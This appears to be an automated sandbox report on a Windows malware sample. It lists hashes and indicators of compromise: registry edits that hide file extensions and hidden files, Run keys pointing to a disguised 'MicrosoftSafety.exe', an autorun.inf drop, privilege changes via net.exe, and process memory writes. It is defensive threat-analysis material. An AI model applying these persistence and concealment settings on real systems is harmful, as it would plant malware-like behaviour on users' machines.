381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09

Analysis

max time kernel
164s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2022, 15:14

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe
Size

184KB
MD5

60efc166f50444a0e8b6b8c1dbfbff40
SHA1

588a9c2580ca4cc27f87af4118a174f550ab7f25
SHA256

381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09
SHA512

3586991f82378a21fde9eed637609fe650221c796ff9239209e670993c41a5c06a0980d83097a69860449ee1d0b5ea5fbfaa40ae2096f987a85696c08a0b6375
SSDEEP

1536:pzY3i6EJ02LyV3kFdp+0zI1ZBjhRDmmHeIcinLJcoHQHF3i6EJ02LyV3rE:pLLyV3kF21im+YLzLyV3I

Score

10^/10

evasion persistence

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
4892	attrib.exe
1464	attrib.exe
1624	attrib.exe
4660	attrib.exe
1300	attrib.exe
3756	attrib.exe

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = " C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe

Drops autorun.inf file 1 TTPs 3 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\autorun.inf	attrib.exe
File opened for modification	C:\autorun.inf	attrib.exe
File created	C:\autorun.inf	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	cmd.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	cmd.exe

Runs net.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe
3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3204 wrote to memory of 2072	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	82
PID 3204 wrote to memory of 2072	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	82
PID 3204 wrote to memory of 2072	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	82
PID 3204 wrote to memory of 4348	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	83
PID 3204 wrote to memory of 4348	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	83
PID 3204 wrote to memory of 4348	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	83
PID 3204 wrote to memory of 4288	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	86
PID 3204 wrote to memory of 4288	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	86
PID 3204 wrote to memory of 4288	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	86
PID 3204 wrote to memory of 4168	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	89
PID 3204 wrote to memory of 4168	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	89
PID 3204 wrote to memory of 4168	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	89
PID 3204 wrote to memory of 5028	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	88
PID 3204 wrote to memory of 5028	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	88
PID 3204 wrote to memory of 5028	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	88
PID 3204 wrote to memory of 4524	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	91
PID 3204 wrote to memory of 4524	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	91
PID 3204 wrote to memory of 4524	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	91
PID 3204 wrote to memory of 4596	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	93
PID 3204 wrote to memory of 4596	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	93
PID 3204 wrote to memory of 4596	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	93
PID 3204 wrote to memory of 1076	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	95
PID 3204 wrote to memory of 1076	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	95
PID 3204 wrote to memory of 1076	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	95
PID 3204 wrote to memory of 4576	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	97
PID 3204 wrote to memory of 4576	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	97
PID 3204 wrote to memory of 4576	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	97
PID 3204 wrote to memory of 4088	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	98
PID 3204 wrote to memory of 4088	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	98
PID 3204 wrote to memory of 4088	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	98
PID 3204 wrote to memory of 4888	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	101
PID 3204 wrote to memory of 4888	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	101
PID 3204 wrote to memory of 4888	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	101
PID 3204 wrote to memory of 216	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	122
PID 3204 wrote to memory of 216	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	122
PID 3204 wrote to memory of 216	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	122
PID 3204 wrote to memory of 1720	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	103
PID 3204 wrote to memory of 1720	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	103
PID 3204 wrote to memory of 1720	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	103
PID 3204 wrote to memory of 3644	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	119
PID 3204 wrote to memory of 3644	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	119
PID 3204 wrote to memory of 3644	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	119
PID 3204 wrote to memory of 4708	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	105
PID 3204 wrote to memory of 4708	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	105
PID 3204 wrote to memory of 4708	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	105
PID 3204 wrote to memory of 4128	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	107
PID 3204 wrote to memory of 4128	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	107
PID 3204 wrote to memory of 4128	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	107
PID 3204 wrote to memory of 904	3204	381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09.exe	108
